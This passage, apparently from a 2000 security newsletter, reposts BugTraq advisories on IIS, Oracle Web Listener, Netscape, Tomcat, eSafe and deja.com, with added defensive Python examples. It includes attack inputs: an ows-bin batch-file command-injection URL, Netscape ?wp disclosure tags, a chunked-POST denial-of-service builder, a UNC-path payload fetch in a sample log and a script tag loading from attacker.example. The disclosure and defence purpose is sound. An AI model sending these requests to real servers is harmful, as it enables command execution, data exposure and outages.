      Trend OfficeScan Corporate Edition 3.11
      Trend OfficeScan Corporate Edition 3.13
      Trend OfficeScan Corporate Edition 3.50
      Trend OfficeScan Corporate Edition 3.51
      Trend OfficeScan for Microsoft SBS 4.5
 
      This vulnerability is only present when the above software version is
      installed on a Windows NT server with IIS. It is not present when the
      above software version is installed on Novell NetWare servers or
      Windows NT server without IIS.
 
      Patch Availability
      ==================
      OfficeScan Unauthenticated CGI Usage patch can be downloaded
      from:
 
      http://www.antivirus.com/download/ofce_patch.htm
 
      More Information
      ================
      Please see the following references for more information related to
      this issue. 
      - Trend Micro Security Bulletin:
      http://www.antivirus.com/download/ofce_patch_351.htm
      - Frequently Asked Questions: Trend Micro Knowledge Base
      http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8
 
      Obtaining Support on this Issue
      ===============================
      This is a fully supported patch. Information on contacting Trend
      Micro Technical Support is available at
      http://www.trend.com/support/default.htm
 
      Acknowledgements
      ================
      Trend Micro thanks Gregory Duchemin
      http://www.securite-internet.com and Elias Levy
      http://www.securityfocus.com for reporting the OfficeScan server
      vulnerability to us, and working with us to protect our customers.
      
      
      
      @HWA
      

92.0  HNS:Gpm-root problems
      ~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      Posted @ March 23, 2000
      When the user selects one of his/her favourite utilities from his/her
      own list, gpm-root starts this process with the group and
      supplementary groups of the gpm-root daemon ...
      
      Gpm-root problems
      Posted to BugTraq on March 23, 2000

      I've sent a report about the following security hole to the authors of
      gpm, but they seemed to ignore the problem. The problem applies to
      every gpm version known to me, for example 1.18.1 and 1.19.0.

      To exploit this problem, gpm-root must be running on the machine and
      the user needs both a login on that machine and physical access to
      the keyboard and mouse.



      gpm-root is a beautiful tool shipped in the gpm package. It pops up
      beautiful menus based on each user's own config file when
      Ctrl+Mousebutton is pressed on the console. 

      When the user selects one of his/her favourite utilities from his/her
      own list, gpm-root starts this process with the group and
      supplementary groups of the gpm-root daemon.



      gpm-root calls setuid() first and setgid() afterwards, hence the latter
      one is unsuccessful. The authors completely forgot about calling
      initgroups().

      Egmont Koblinger
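      The ordering bug described above, as an added example (this is not
      gpm's code). A real kernel refuses setgid() and setgroups()/initgroups()
      once the effective uid is no longer 0, so a daemon that calls setuid()
      first has thrown away the right to fix its group identity. The Creds
      class below is a deliberately small model of just those rules, so the two
      sequences can be compared without running as root; drop_privileges()
      shows the same correct sequence with the real os calls and the
      after-the-fact check a practitioner adds. The uids, gids and user name
      are constructed values.

```python
import os


class PrivilegeError(PermissionError):
    """Raised when a credential change is not permitted or did not take."""


class Creds:
    """Model of the credential rules that matter here (a model, not a kernel):
    setgid() and initgroups()/setgroups() need an effective uid of 0, and a
    setuid() to a non-zero uid gives that right up."""

    def __init__(self, uid=0, gid=0, groups=(0,)):
        self.uid, self.gid, self.groups = uid, gid, tuple(groups)

    def setuid(self, uid):
        if self.uid != 0 and uid != self.uid:
            raise PrivilegeError("setuid: operation not permitted")
        self.uid = uid

    def setgid(self, gid):
        if self.uid != 0 and gid != self.gid:
            raise PrivilegeError("setgid: operation not permitted")
        self.gid = gid

    def initgroups(self, groups):
        if self.uid != 0:
            raise PrivilegeError("initgroups: operation not permitted")
        self.groups = tuple(groups)


class Target:
    """The user whose menu entry is being started (constructed values)."""

    def __init__(self, uid, gid, groups):
        self.uid, self.gid, self.groups = uid, gid, tuple(groups)


def gpm_root_order(daemon, user):
    """The sequence the post describes: setuid() first, setgid() afterwards,
    no initgroups(). setgid() fails and the failure goes unnoticed, so the
    child keeps the daemon's gid and supplementary groups."""
    daemon.setuid(user.uid)
    try:
        daemon.setgid(user.gid)
    except PrivilegeError:
        pass                      # this is exactly the error that is ignored
    return daemon


def correct_order(daemon, user):
    """Change group identity while still root, then the uid, then verify."""
    daemon.initgroups(user.groups)
    daemon.setgid(user.gid)
    daemon.setuid(user.uid)
    if (daemon.uid, daemon.gid, set(daemon.groups)) != (
            user.uid, user.gid, set(user.groups)):
        raise PrivilegeError("privilege drop incomplete")
    return daemon


def drop_privileges(username, uid, gid):
    """The same sequence with the real calls, for a process that starts as
    root (not exercised by the model above; it needs root to succeed)."""
    os.initgroups(username, gid)  # supplementary groups from the group database
    os.setgid(gid)
    os.setuid(uid)
    try:
        os.setuid(0)              # must fail now; success means nothing was dropped
    except PermissionError:
        return True
    raise PrivilegeError("privileges were not dropped")
```

      With the daemon's order the child ends up as uid 1000 but still gid 0
      with supplementary group 0, which is what the post reports; with the
      correct order every field matches the target user, and the trailing
      check makes a silent failure impossible.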
      
      
      
      @HWA

93.0  HNS:Esafe Protect Gateway (CVP) problems
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      Posted @ March 22, 2000
      The Esafe Protect Gateway (ESPG) does not scan some files in
      combination with FireWall-1 and CVP ... 
      
      Esafe Protect Gateway (CVP) problems
      Posted to BugTraq on March 22, 2000

      After notification of the manufacturer, here is the full report on
      a problem noted with Esafe Protect Gateway.

      SUMMARY
      -------

      The Esafe Protect Gateway (ESPG) does not scan some files in
      combination with FireWall-1 and CVP.

      DETAILS
      -------

      If you want the Esafe Protect Gateway to scan all content for the
      presence of a virus you have two options.

      1. Choose to scan anything not listed in the 'safe file types' list. And
      then clear out all entries in that list.

      2. Choose to scan only files listed in the 'dangerous file types' list.
      And then have only one extension listed namely '*'.

      Deciding to rely on extensions seems an indication of a flawed
      design already. Renaming files is a common practice and can be
      done by anyone capable of operating a keyboard.

      The problem is that anything with the MIME type set to TEXT/HTML
      will not be scanned regardless of the options recommended above.

      A simple test was capable of pointing this out.

      Set up a default Apache server. Copy a virus file to two locations,
      http://website/test1.txt and http://website/test1.html, and try to
      download them with your favourite browser. The URL is unique and
      was never used by your browser, to minimise the possibility of
      caches being in place. But forced reloads work properly and are
      sufficient if you want to replicate this issue.

      Downloading http://website/test1.html does nothing to detect the
      virus and it is yours. No protection is offered.
      Downloading http://website/test1.txt will not work as ESPG will now
      intercept the file containing the virus.

      By adjusting the webserver to send out *.txt as MIME type
      TEXT/HTML and *.html as MIME type TEXT/PLAIN you can now test
      with http://website/test2.txt and http://website/test2.html to verify
      things. Downloading http://website/test2.txt will get you infected as
      ESPG will not scan the file. And downloading
      http://website/test2.html will not work as ESPG detects the virus
      and will prevent it from downloading. 

      CONCLUSION
      ----------

      Esafe Protect Gateway can at present not be trusted to protect you
      from downloading a virus.

      VERSIONS
      --------

      Esafe Protect Gateway v2.1 build 98.
      Virus tables dated March 15, 2000.

      STATUS
      ------
      ------

      Manufacturer notified.
      No fix available.
      Results have not been confirmed yet.

      However I was able to verify that the problem lies with Esafe and not
      with Check Point by using Trend Micro's CVP server instead which
      did not suffer from the same problem.

      Hugo.
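      The four downloads in the report, as an added example (not Hugo's
      test setup and not eSafe's code). The point of the matrix is that a
      scan decision taken from the file extension or the Content-Type header
      is taken from data the web server, and therefore an attacker who
      controls a web server, chooses. policy_by_type() models the behaviour
      described above (scan by extension, but never scan text/html);
      policy_scan_everything() ignores both signals. The Response class, the
      signature string and the "virus file" are constructed stand-ins, not
      real malware or a real detection signature.

```python
from dataclasses import dataclass


@dataclass
class Response:
    url: str
    content_type: str     # value of the HTTP Content-Type header
    body: bytes


# Constructed stand-in for a scanner signature; deliberately not a real one.
SIGNATURE = b"CONSTRUCTED-TEST-MALWARE-MARKER"
INFECTED = b"MZ" + b"\0" * 8 + SIGNATURE + b"\0" * 8   # constructed "virus file"


def mime_type(header):
    """'text/html; charset=iso-8859-1' -> 'text/html'."""
    return header.split(";", 1)[0].strip().lower()


def extension(url):
    name = url.split("?", 1)[0].rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def policy_by_type(resp, dangerous=frozenset({"*"})):
    """Model of the reported behaviour: scan the 'dangerous' extensions
    ('*' meaning all of them) but never anything served as text/html."""
    if mime_type(resp.content_type) == "text/html":
        return False
    return "*" in dangerous or extension(resp.url) in dangerous


def policy_scan_everything(resp):
    """Decide from nothing the remote side controls: scan every body."""
    return True


def gateway(resp, policy):
    """Verdict of a content-scanning gateway under the given policy."""
    if policy(resp) and SIGNATURE in resp.body:
        return "blocked"
    return "passed"


def run_matrix(policy):
    """The report's four cases: extension and Content-Type agree for test1,
    are swapped for test2. Returns {url: verdict}."""
    cases = [
        Response("http://website/test1.txt", "text/plain", INFECTED),
        Response("http://website/test1.html", "text/html", INFECTED),
        Response("http://website/test2.txt", "text/html", INFECTED),    # .txt sent as HTML
        Response("http://website/test2.html", "text/plain", INFECTED),  # .html sent as plain
    ]
    return {r.url: gateway(r, policy) for r in cases}
```

      Under policy_by_type the verdicts follow the Content-Type header, not
      the file: test1.html and test2.txt pass, which reproduces the report.
      Under policy_scan_everything all four are blocked, because the only
      input to the decision is the body itself.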
      
      
      
      
      
      @HWA

94.0  HNS:Bug in Apache project: Jakarta Tomcat
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      Posted @ March 22, 2000
      The Apache project: Jakarta Tomcat contains a serious security bug.
      Tomcat is used together with the Apache web server to serve Java
      Server Pages and Java servlets. ... 
      
      
      Bug in Apache project: Jakarta Tomcat
      Posted to BugTraq on March 22, 2000

      The Apache project: Jakarta Tomcat contains a serious security
      bug. Tomcat is used together with the Apache web server to serve
      Java Server Pages and Java servlets.
      The summary from the Tomcat development team advisory is posted
      below:

      Advisory:

      Delivered with Tomcat is an example (jsp/source.jsp) that can be
      used to deliver the contents of any file on your machine.

      Recommended action:

      The simplest course of action is to simply remove this example from
      your machine. Alternatively, you can replace the associated
      ShowSource.class file with one from the current 3.1 beta.

      Fixes:

      Fixes have been made to the core of Tomcat to not allow any file
      references to be resolved outside of the context being used for the
      resolution. Additionally, a change has been made to
      ShowSource.java to disallow any requests which contain the string
      "..".

      The 3.1 beta 1 release has been refreshed with these fixes applied.

      Med venlig hilsen/Best regards/Freundliche Grüße

      Jan Madsen

      S e c u r i t y w o r k e r s
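      The two fixes named in the advisory are of different strength, and the
      following added example (not Tomcat's code, and not the ShowSource.java
      change itself) shows why. substring_check() is a stand-alone version of
      the second fix: refuse any request containing "..". resolve_in_context()
      is the shape of the first: map the reference onto the filesystem and
      accept it only if the resolved path is still inside the context. The
      context root "/srv/webapps/examples" and the request paths are
      constructed; whether Tomcat decoded the request before ShowSource saw
      it is not stated in the advisory, so the percent-encoded case is shown
      as what the substring check alone would miss if decoding happened later.

```python
import os
from urllib.parse import unquote


class OutsideContext(ValueError):
    """The requested file reference resolves outside the web application."""


def substring_check(request_path):
    """The advisory's second fix as a stand-alone check: no '..' anywhere.
    It inspects the string it is given, not the path the OS will open."""
    return ".." not in request_path


def resolve_in_context(context_root, request_path):
    """Map a client-supplied file reference onto the filesystem and guarantee
    the result lies inside context_root. Raises OutsideContext otherwise."""
    decoded = unquote(request_path)          # '%2e%2e' is '..' once decoded
    decoded = decoded.replace("\\", "/")     # backslash separates on NT hosts
    if "\x00" in decoded:                    # a NUL would truncate the name in C
        raise OutsideContext(request_path)
    root = os.path.realpath(context_root)
    # join() discards root if decoded is absolute; realpath() folds '.', '..'
    # and symlinks. Either way the containment test below decides.
    candidate = os.path.realpath(os.path.join(root, decoded))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise OutsideContext(request_path)
    return candidate


def is_inside(context_root, request_path):
    """Boolean form of resolve_in_context() for policy code."""
    try:
        resolve_in_context(context_root, request_path)
        return True
    except OutsideContext:
        return False
```

      The containment test compares resolved paths, so encodings, mixed
      separators and "jsp/../.." sequences are all judged by where they
      actually land rather than by what the string looks like. The example
      deliberately does not rewrite an escaping path into an allowed one
      (for instance by stripping leading ".."): a request that tries to leave
      the context is rejected, not silently corrected.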
      
      @HWA
      
      

95.0  HNS:MS SECURITY BULLETIN #18
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      Posted @ March 21, 2000
      Microsoft has released a patch that eliminates a security vulnerability
      in Microsoft Internet Information Server 4.0. The vulnerability could
      allow a malicious user to consume all resources on a web server
      and prevent it from servicing other users. ...
      
      MS SECURITY BULLETIN #18
      Posted to BugTraq on March 21, 2000

      Microsoft Security Bulletin (MS00-018)
      - --------------------------------------

      Patch Available for "Chunked Encoding Post" Vulnerability

      Originally Posted: March 20, 2000

      Summary
      =======

      Microsoft has released a patch that eliminates a security vulnerability
      in Microsoft(r) Internet Information Server 4.0. The vulnerability could
      allow a malicious user to consume all resources on a web server and
      prevent it from servicing other users.

      Frequently asked questions regarding this vulnerability can be
      found at
      http://www.microsoft.com/technet/security/bulletin/fq00-018.asp.

      Issue
      =====
      IIS 4.0 supports chunked encoding transfers, but does not limit
      the size of the buffer that can be reserved. This would allow a
      malicious user to request an extremely large buffer for a POST or
      PUT operation, but never actually send data, thereby blocking
      memory on the server that had been allocated to the session. If
      sufficient memory on the server were blocked in this fashion, it could
      prevent the server from performing useful work. There is no capability
      through this attack to create, modify or delete data on the server, nor
      is there any capability to usurp administrative control of the server. If
      the malicious user closed his session, the memory would be released
      and the server's operation would return to normal. Otherwise, the
      machine could be put back into normal service by stopping and
      restarting the service.

      Affected Software Versions
      ==========================
      - Microsoft Internet Information Server 4.0

      Patch Availability
      ==================
      - X86:
      http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19761
      - Alpha:
      http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19762

      NOTE: Additional security patches are available at the
      Microsoft Download Center
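      The attack the bulletin describes, and the server-side rule that defeats
      it, as an added example (not Microsoft's code or the patch). dos_request()
      builds the request shape: a chunked POST whose first chunk-size line
      announces an enormous chunk, followed by nothing. decode_chunked()
      shows the defensive reading of the same encoding: the announced size
      is bounded before anything is allocated, and memory is committed only
      for bytes that have actually arrived. The limits, the request path and
      the host name are assumptions made for the example.

```python
MAX_CHUNK = 64 * 1024          # assumed ceiling on a single chunk
MAX_BODY = 4 * 1024 * 1024     # assumed ceiling on the whole entity body


class ChunkTooLarge(ValueError):
    """An announced chunk (or the running body) exceeds the configured limit."""


class Incomplete(ValueError):
    """The bytes received so far do not contain a complete chunk."""


def dos_request(host, claimed_chunk_size, path="/default.asp"):
    """The request the bulletin describes: announce a huge chunk, send no data."""
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Transfer-Encoding: chunked\r\n\r\n"
            f"{claimed_chunk_size:x}\r\n").encode("ascii")


def parse_chunk_size(line):
    """Parse a 'hex-size[;extensions]' line (RFC 2616 section 3.6.1)."""
    field = line.split(b";", 1)[0].strip()
    if not field or any(c not in b"0123456789abcdefABCDEF" for c in field):
        raise ValueError("malformed chunk-size line")
    return int(field, 16)


def reserve_chunk(line, max_chunk=MAX_CHUNK):
    """Bound the announced size BEFORE any buffer is sized from it."""
    size = parse_chunk_size(line)
    if size > max_chunk:
        raise ChunkTooLarge(size)
    return size


def decode_chunked(data, max_chunk=MAX_CHUNK, max_body=MAX_BODY):
    """Decode a chunked body from bytes already received. Allocation grows
    with data actually present, never with the size the client announced."""
    out = bytearray()
    pos = 0
    while True:
        nl = data.find(b"\r\n", pos)
        if nl < 0:
            raise Incomplete("chunk-size line not terminated")
        size = reserve_chunk(data[pos:nl], max_chunk)
        pos = nl + 2
        if size == 0:
            return bytes(out)                 # last-chunk; trailers not handled here
        if len(out) + size > max_body:
            raise ChunkTooLarge(len(out) + size)
        if len(data) < pos + size + 2:
            raise Incomplete("chunk data not yet received")
        out += data[pos:pos + size]
        pos += size + 2                       # skip the CRLF ending the chunk


def body_of(request):
    """Split an HTTP request into its body for feeding decode_chunked()."""
    return request.split(b"\r\n\r\n", 1)[1]
```

      A server built this way answers the bulletin's request with an error
      as soon as it reads "7fffffff", having allocated nothing; the per-body
      cap additionally stops a client from reaching the same total through
      many small chunks. A per-connection read timeout is still needed for
      clients that announce a legal size and then go silent.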
      
      
      @HWA
      
      

96.0  HNS:S.A.F.E.R. Security Bulletin 000317
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      Posted @ March 20, 2000
      Problem exists in Netscape Enterprise Server that can allow remote
      user to obtain list of directories and subdirectories on the server ...
      
      S.A.F.E.R. Security Bulletin 000317
      Posted to BugTraq on March 20, 2000

      S.A.F.E.R. Security Bulletin 000317.EXP.1.5

      ______________________________________________

      TITLE : 
      Netscape Enterprise Server and '?wp' tags
      DATE : 
      March 17, 2000
      NATURE : 
      Remote user can obtain list of directories on Netscape Enterprise
      Server
      AFFECTED : 
      Netscape Enterprise Server 3.x

      PROBLEM:

      Problem exists in Netscape Enterprise Server that can allow remote
      user to obtain list of directories and subdirectories on the server.

      DETAILS:

      Netscape Enterprise Server with 'Web Publishing' enabled can be
      tricked into displaying the list of directories and subdirectories, if
      the user supplies certain 'tags'. For example:

      http://home.netscape.com/?wp-cs-dump

      will reveal the contents of the root directory on that web
      server. Contents of subdirectories can be obtained as well. Other
      tags that can be used are:

      ?wp-ver-info
      ?wp-html-rend
      ?wp-usr-prop
      ?wp-ver-diff
      ?wp-verify-link
      ?wp-start-ver
      ?wp-stop-ver
      ?wp-uncheckout

      FIXES:

      Disable 'Web Publishing'. It is safe to assume that 'Web Publishing'
      is not the only feature that will 'activate' this problem. We have
      found a few servers running Netscape Enterprise Server that did not
      have 'Web Publishing' enabled, but were still vulnerable to this
      problem. Until Netscape makes an official response and clarifies what
      the cause of this problem is, it is advised that you test your server
      against this vulnerability, and if you are vulnerable, try to disable
      certain features and services.

      Netscape has been contacted on many occasions, but has failed
      to respond.

      S.A.F.E.R. - Security Alert For Enterprise Resources
      Copyright (c) 2000 The Relay Group
      
      
      @HWA
      

97.0  HNS:Decon fix for con/con is vulnerable
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      Posted @ March 18, 2000
      If you had the con problem and installed the Decon fix, you are now
      vulnerable to another Win 95 (possibly)/98 (tested) crash which is
      worse than the previous one. ...
      
      Decon fix for con/con is vulnerable
      Posted to BugTraq on March 18, 2000

      If you had the con problem and installed the Decon fix, you are now
      vulnerable to another Win 95 (possibly)/98 (tested) crash which is
      worse than the previous one.

      Software affected: All versions of Microsoft Internet Explorer
      (It doesn't work in Netscape Navigator)

      Actual problem: Type an existing server in the address box, and then
      request a nonexistent file with a name of >300 symbols. After the server
      sends its reply to the browser your system stops responding at all;
      Control+Alt+Del works but you won't see the box with the running tasks,
      so the only thing you can do is REBOOT.
      Somebody can deface some good website and create a redirect with
      0 seconds waiting to such a link.
      Example : 

      http://www.amsouth.com/(lot of aaaa's).html

      Fix: Delete the Decon fix from the startup folder :) Now you are vulnerable to
      con/con.

      Hello to Cre@tor

      Speedo 
      mailto:Tima@au.ru
      
      
      @HWA
      
      

98.0  HNS:Cerberus Information Security Advisory
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      Posted @ March 17, 2000
      The Cerberus Security Team has discovered a number of issues
      with Oracle's Web Listener, part of the Oracle Application Server,
      that can allow a remote attacker to run arbitrary commands on the
      web server ... 
      
      Cerberus Information Security Advisory
      Posted to BugTraq on March 17, 2000

      Released : 15th March 2000
      Name : Oracle
      Affected Systems : Oracle Web Listener 4.0.x on Windows NT
      Issue : Attackers can run arbitrary commands on the webserver

      Description
      ***********
      The Cerberus Security Team has discovered a number of issues
      with Oracle's Web Listener, part of the Oracle Application Server,
      that can allow a remote attacker to run arbitrary commands on the
      web server.

      Details
      *******
      Part of the problem is caused by default settings after OAS has
      been installed. The "ows-bin" virtual directory on an Oracle Web
      Listener is the equivalent of the "cgi-bin" on other web servers and
      by default this is set to C:\orant\ows\4.0\bin - this directory not only
      contains a number of batch files, DLLs and executables but also the
      binary image file for the Listener itself. Even if this default setting
      has been changed, however, you may still be at risk if you have batch
      files in the new "ows-bin" directory.

      Arbitrary Command Execution
      ***************************
      The Oracle Web Listener will execute batch files as CGI scripts and
      by making a request to a batch file that requires one or more
      arguments it is possible to execute any command the attacker
      wants by building a special query string.

      For example the following will give a directory listing: 

      http://charon/ows-bin/perlidlc.bat?&dir 

      It is even possible to use UNC paths so the Listener will connect to
      the remote machine over NBSession, download the executable and
      then execute it.

      By default the Web Listener process runs in the security context of
      SYSTEM so any commands issued by an attacker will run with
      SYSTEM privileges.

      Another problem is that the Listener will expand the "*" character so
      even if the attacker doesn't know the name of a real batch file in the
      "ows-bin" they can request *.bat?&command

      Executables
      ***********
      Some of the executables in the default directory allow attackers to
      kill services, return configuration information and cause other
      undesirable events to occur.

      Solution:
      *********
      Due to the severity of this problem Cerberus recommends that the
      following be actioned immediately.

      If "ows-bin" is the default then using the Oracle Application Server
      Manager remove the ows-bin virtual directory or point it to a more
      benign directory. If "ows-bin" is not the default then verify that there
      are no batch files in this directory. A check for this has been added
      to Cerberus' security scanner, CIS, available from their website.

      About Cerberus Information Security, Ltd
      ********************************
      Cerberus Information Security, Ltd, a UK company, are specialists
      in penetration testing and other security auditing services. They are
      the developers of CIS (Cerberus' Internet security scanner) available
      for free from their website: http://www.cerberus-infosec.co.uk

      To ensure that the Cerberus Security Team remains one of the
      strongest security audit teams available globally they continually
      research operating system and popular service software
      vulnerabilities leading to the discovery of "world first" issues. This not
      only keeps the team sharp but also helps the industry and vendors
      as a whole ultimately protecting the end consumer. As testimony to
      their ability and expertise one just has to look at exactly how many
      major vulnerabilities have been discovered by the Cerberus Security
      Team - over 40 to date, making them a clear leader of companies
      offering such security services.

      Founded in late 1999, by Mark and David Litchfield, Cerberus
      Information Security, Ltd are located in London, UK but serves
      customers across the World. For more information about Cerberus
      Information Security, Ltd please visit their website or call on +44(0)
      181 661 7405 

      Permission is hereby granted to copy or redistribute this advisory
      but only in its entirety.

      Copyright (C) 2000 by Cerberus Information Security, Ltd
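      What the abuse described above looks like in a web server log, and a
      detection pass over it, as an added example (not part of the Cerberus
      advisory or of CIS). The query string of a request like
      /ows-bin/perlidlc.bat?&dir is handed to the batch file as its arguments,
      so a command separator in the query is the tell; the advisory's other
      two tricks, the "*.bat" wildcard and a UNC path to fetch an executable
      from the attacker's host, are flagged the same way. The log lines are
      constructed in Common Log Format and mirror the advisory's examples;
      they are not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (Common Log Format). Not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Mar/2000:10:01:02 +0000] "GET /ows-bin/perlidlc.bat?&dir HTTP/1.0" 200 1834
10.0.0.5 - - [17/Mar/2000:10:01:09 +0000] "GET /ows-bin/*.bat?&net+user HTTP/1.0" 200 512
10.0.0.7 - - [17/Mar/2000:10:02:00 +0000] "GET /ows-bin/report.bat?quarter=1 HTTP/1.0" 200 211
10.0.0.9 - - [17/Mar/2000:10:03:00 +0000] "GET /ows-bin/perlidlc.bat?&%5c%5c10.0.0.9%5cshare%5cevil.exe HTTP/1.0" 200 77
10.0.0.2 - - [17/Mar/2000:10:04:00 +0000] "GET /index.html HTTP/1.0" 200 5120
"""

LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)')


def classify_target(target):
    """Return the reasons a request target matches the advisory's patterns
    (empty list for anything else). Decoding first so %26 is seen as '&'."""
    path, _, query = target.partition("?")
    path, query = unquote(path), unquote(query)
    reasons = []
    if not path.lower().startswith("/ows-bin/"):
        return reasons
    if path.lower().endswith(".bat"):
        if "*" in path:
            reasons.append("wildcard batch file name")
        if "&" in query or "|" in query:
            reasons.append("command separator in query string")
        if "\\\\" in query:
            reasons.append("UNC path in query string")
    return reasons


def scan_log(text):
    """Run classify_target() over every parseable line; return the hits as
    (source address, request target, reasons) tuples in log order."""
    hits = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        reasons = classify_target(m["target"])
        if reasons:
            hits.append((m["src"], m["target"], reasons))
    return hits
```

      A legitimate call with ordinary parameters (report.bat?quarter=1) is
      not flagged, which matters because the advisory's remediation, removing
      batch files from ows-bin entirely, is the fix; this pass is for finding
      out whether anyone tried before that was done.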

      
      
      @HWA
      
99.0  HNS:Malicious-HTML vulnerabilities at deja.com
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      Posted @ March 17, 2000
      Deja.com does not always escape meta-characters when displaying
      Usenet articles. This allows an attacker to include arbitrary tags in
      the HTML sent to people reading the attacker's article at deja.com.
      ...
      
      Malicious-HTML vulnerabilities at deja.com
      Posted to BugTraq on March 17, 2000

      Niall Smart, niall@pobox.com

      Synopsis
      ========
      deja.com does not always escape meta-characters when
      displaying Usenet articles. Specifically, the article view
      page (http://www.deja.com/getdoc.xp) and the thread view
      page (http://www.deja.com/viewthread.xp) display the subject of
      the article "as is" between title tags.

      This allows an attacker to include arbitrary tags in the HTML sent to
      people reading the attacker's article at deja.com.

      There are probably a large number of sites out there with this type of
      vulnerability; the deja.com example is interesting because it's a busy
      site with a large number of users who naively trust it.

      Exploit
      =======
      An attacker can embed any tag in the head or body of the HTML
      page. This allows numerous attacks including:

      Cross Site Scripting:

      An attacker can post an article with a link to a script on
      another server and call that script from the onLoad event handler.

      Site Spoofing:

      An attacker can use a meta tag to automatically redirect the user to
      a spoofed version of deja.com.

      See the CERT advisory referenced below for more information on
      this type of attack.

      Examples
      ========
      NOTE: The following examples are intended to be harmless,
      however I take no responsibility for any damage caused by following
      these links.

      JavaScript popup:

      http://www.deja.com/getdoc.xp?AN=591804116

      Redirection using meta tag:

      http://www.deja.com/getdoc.xp?AN=591833344

      Notes
      =====

      I haven't thoroughly tested deja.com's pages, there may be
      other instances of this error. It would be particularly interesting to find
      one that didn't require the attacker to include the HTML in the subject
      field of the article.

      This example illustrates how *not* to approach
      meta-character escaping. If you call a function to escape
      meta-characters each time the data is inserted into the web page, as
      deja.com appear to do, you run the risk of occasionally forgetting to
      do it. deja.com escape correctly in two other places on the article
      view page but forget once. Instead you should escape them earlier in
      the data flow, perhaps just after getting the data from the database,
      thereby precluding the human-error factor.

      References
      ==========

      CA-2000-02 Malicious HTML Tags Embedded in Client Web
      Requests
      http://www.cert.org/advisories/CA-2000-02.html

      HTML 3.2 Character Entities
      http://www.w3.org/TR/REC-html32.html#latin1
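      The "escape at the data boundary, not at every render site" design
      argued for above, as an added example (not deja.com's code and not
      Niall Smart's). Two templates model the two pages: each escapes the
      subject in some places and forgets it inside <title>, as the report
      describes. load_article_raw() hands the database row to the templates
      as-is; load_article_escaped() escapes once where the data enters the
      application, so the forgotten spot is harmless. The Markup type is what
      makes escape-early safe to combine with render-time escaping: h() is
      idempotent on it, so nothing gets escaped twice. The hostile subject
      and the row layout are constructed.

```python
import html


class Markup(str):
    """A string already safe to place in HTML element content; h() passes it through."""


def h(value):
    """Escape for HTML element content unless already Markup (no double escaping)."""
    if isinstance(value, Markup):
        return value
    return Markup(html.escape(str(value), quote=True))


class Article:
    def __init__(self, subject, body):
        self.subject, self.body = subject, body


def load_article_raw(row):
    """Escape-at-render model: the raw database row reaches every template."""
    return Article(row["subject"], row["body"])


def load_article_escaped(row):
    """Escape-at-boundary model: escape once, where the data enters the application."""
    return Article(h(row["subject"]), h(row["body"]))


def render_getdoc(article):
    """Article view: two places escape, the <title> does not (the reported bug)."""
    return ("<html><head><title>" + article.subject + "</title></head>"
            "<body><h1>" + h(article.subject) + "</h1>"
            "<pre>" + h(article.body) + "</pre></body></html>")


def render_viewthread(article):
    """Thread view: same forgotten <title>."""
    return ("<html><head><title>" + article.subject + "</title></head>"
            "<body><p>" + h(article.body) + "</p></body></html>")


# Constructed hostile Usenet article: the subject closes <title> and injects a tag.
HOSTILE_ROW = {
    "subject": '</title><script src="http://attacker.example/x.js"></script><title>',
    "body": "nothing to see here",
}


def injected(page):
    """True if a tag from the subject survived into the page unescaped."""
    return "<script" in page.lower()
```

      The boundary approach covers templates that have not been written yet,
      which is the point of the advice. It only covers the HTML element
      context, though: data placed into an attribute, a URL or a script
      block needs that context's own escaping, and the Markup marker must not
      be treated as a licence to put the value there.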
      
      
      @HWA
      
      

100.0 HNS:Certificate Validation Error in Netscape Browsers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      Posted @ March 17, 2000
      The problem is that there is an inherited trust between an
      expired certificate and an active certificate, where there really
      shouldn't be. If any trust should be there, it certainly shouldn't be
      with an expired certificate. ...
      
      Certificate Validation Error in Netscape Browsers
      Posted to BugTraq on March 17, 2000

      This may not be a normal "BugTraq" issue, since it is more a flaw in
      trust in a security design than it is an actual bug in
      software...but none-the-less I think it is something that should be
      discussed. I haven't checked this with Microsoft IE, I just noticed it
      as being a flaw in Netscape (submitted a bug report to them earlier
      but they are either really busy or have chosen to ignore the report.)
      Tested in browsers from 4.07 - 4.72, all of which operated in the same
      fashion.

      What is the issue?

      The scenario is that a user accesses a website for which they do
      not currently have trust for the signer of the certificate. They are
      asked whether they would like to trust the server certificate (until
      it expires), and if they respond yes, the web site signer certificate
      will be stored in the certificate database. You can check on
      these certificates by clicking on the Security Icon on the browser,
      then select the Website item from the menu. Once stored in the
      database, any future access to this site is permitted without
      warning. The error occurs when the web site certificate is expired
      and the new site certificate is valid: Netscape never checks to see if
      the certificate is expired and replaced with a new certificate, and
      thus the user can continue to access the site without a warning
      stating that the certificate is expired and that a new certificate exists
      for the site (it apparently only checks to see if the new certificate
      isn't expired.) Manually verifying the old certificate in the database
      will prove that the certificate is invalid. When the site is properly
      reissued a certificate, Netscape automatically trusts the
      new certificate based on the previous certificate...if the
